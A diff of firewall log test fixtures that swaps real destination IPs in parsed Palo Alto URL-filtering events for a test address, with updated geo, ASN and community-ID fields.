@@ -7424,29 +7489,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7462,14 +7526,14 @@ "port": 53100, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -7484,7 +7548,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:l+VVTNzHKEhzOIqE/8PVt4xidPQ=" + "community_id": "1:r1f3rhFYHx9LM+VykIhEs41wnu0=" } }, "threat_category": "unknown", @@ -7529,8 +7593,8 @@ ], "network": { "community_id": [ - "1:ZWPOx8XRihDI9+WqUDIHe1OyInQ=", - "1:l+VVTNzHKEhzOIqE/8PVt4xidPQ=" + "1:xvKK6D+0SZ3Et3BSKLgAX+7nwag=", + "1:r1f3rhFYHx9LM+VykIhEs41wnu0=" ], "transport": "tcp", "application": "ssl", @@ -7569,14 +7633,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768155526Z", - "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691904200Z", + "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:59.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -7599,29 +7663,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7637,14 +7700,14 @@ "port": 53101, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -7659,7 +7722,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:/GTSxrH684FoBXpyEBepCy2M81Q=" + "community_id": "1:v8zN/HG83YdJLlQ7mL/SY7vviOI=" } }, "threat_category": "unknown", @@ -7704,8 +7767,8 @@ ], "network": { "community_id": [ - "1:T7UcACShDtZytIaufQKjiQ8jkhM=", - "1:/GTSxrH684FoBXpyEBepCy2M81Q=" + "1:40MD/GuIwR83Uf3M4As6pXJG2E8=", + "1:v8zN/HG83YdJLlQ7mL/SY7vviOI=" ], "transport": "tcp", "application": "ssl", @@ -7744,14 +7807,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768191562Z", - "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691908400Z", + "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -7774,29 +7837,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7812,14 +7874,14 @@ "port": 53104, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -7834,7 +7896,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:z/innn6bIUB0vbGtF+NoTKxtaCQ=" + "community_id": "1:wf5lEguVgQsAUnhrU+YouQAxkh8=" } }, "threat_category": "unknown", @@ -7879,8 +7941,8 @@ ], "network": { "community_id": [ - "1:v2q2MvHECPCP6FDhZOfU9EhWDmw=", - "1:z/innn6bIUB0vbGtF+NoTKxtaCQ=" + "1:AjOdj1GAtVoz65E9UEfPtazi3B4=", + "1:wf5lEguVgQsAUnhrU+YouQAxkh8=" ], "transport": "tcp", "application": "ssl", @@ -7919,14 +7981,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768199510Z", - "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691913400Z", + "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -7949,29 +8011,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7987,14 +8048,14 @@ "port": 53107, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -8009,7 +8070,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:7H4lb05cbTOpCa4pIgruj3M2WrY=" + "community_id": "1:A5t6X24NgS7mAag+SYzKa1Dk6Fc=" } }, "threat_category": "unknown", @@ -8054,8 +8115,8 @@ ], "network": { "community_id": [ - "1:/FL+10fyEBLqVR4oJrH3NBEx/pg=", - "1:7H4lb05cbTOpCa4pIgruj3M2WrY=" + "1:T0Ogviwzzsc+cwiM0Fh+DrlGSGI=", + "1:A5t6X24NgS7mAag+SYzKa1Dk6Fc=" ], "transport": "tcp", "application": "ssl", @@ -8094,14 +8155,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768203612Z", - "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691919900Z", + "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -8124,29 +8185,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -8162,14 +8222,14 @@ "port": 53108, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -8184,7 +8244,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:G3GfJYWnCjo8Ato/aBgr49UKGTI=" + "community_id": "1:14BTIIGeTcGSNZJDnjEduxdXfgw=" } }, "threat_category": "unknown", @@ -8229,8 +8289,8 @@ ], "network": { "community_id": [ - "1:abQPCp6V8x2Fumiz5x/+vZnuNfM=", - "1:G3GfJYWnCjo8Ato/aBgr49UKGTI=" + "1:wU3xR7CIw4IWAct08AnxyKRh9iI=", + "1:14BTIIGeTcGSNZJDnjEduxdXfgw=" ], "transport": "tcp", "application": "ssl", @@ -8269,14 +8329,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768207539Z", - "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691924600Z", + "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -8299,29 +8359,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -8337,14 +8396,14 @@ "port": 53109, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -8359,7 +8418,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:Ni0ZlLTDuNH8F3hFm9nLZkj/SKI=" + "community_id": "1:Vw9yNfip9vmzNdY3gjo9ajxkxaU=" } }, "threat_category": "unknown", @@ -8404,8 +8463,8 @@ ], "network": { "community_id": [ - "1:Ix3Fldb6W5hQx30Bw7Vd5/lm8hw=", - "1:Ni0ZlLTDuNH8F3hFm9nLZkj/SKI=" + "1:uE5isgLEWIN8/Mig2yUOivorXgg=", + "1:Vw9yNfip9vmzNdY3gjo9ajxkxaU=" ], "transport": "tcp", "application": "ssl", @@ -8444,14 +8503,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768211464Z", - "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691929300Z", + "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -8474,29 +8533,28 @@ "destination": { "nat": { "port": 443, - "ip": "216.58.194.98" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0839, - "lat": 37.3861 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "216.58.194.98" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -8512,14 +8570,14 @@ "port": 53118, "ip": "192.168.15.224" }, - "message": "192.168.15.224,216.58.194.98,192.168.1.63,216.58.194.98,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,\"www.googleadservices.com/\",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,\"www.googleadservices.com/\",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "216.58.194.98" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -8534,7 +8592,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:WQC21tSR1QNUhWYgrcbgaLyTkos=" + "community_id": "1:PA/ZryCD/H/jh73q79O5GKFA1Hw=" } }, "threat_category": "unknown", @@ -8579,8 +8637,8 @@ ], "network": { "community_id": [ - "1:iBwlaPm6awPJaLJMdMMVOH9f5RU=", - "1:WQC21tSR1QNUhWYgrcbgaLyTkos=" + "1:E0CnmmCgablpVNZk6myszTdTEaA=", + "1:PA/ZryCD/H/jh73q79O5GKFA1Hw=" ], "transport": "tcp", "application": "ssl", @@ -8619,14 +8677,14 @@ ], "ip": [ "192.168.15.224", - "216.58.194.98", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768215359Z", - "original": "Nov 30 16:45:14 PA-220 1,2018/11/30 16:45:13,012801096514,THREAT,url,2049,2018/11/30 16:45:13,192.168.15.224,216.58.194.98,192.168.1.63,216.58.194.98,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,\"www.googleadservices.com/\",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United 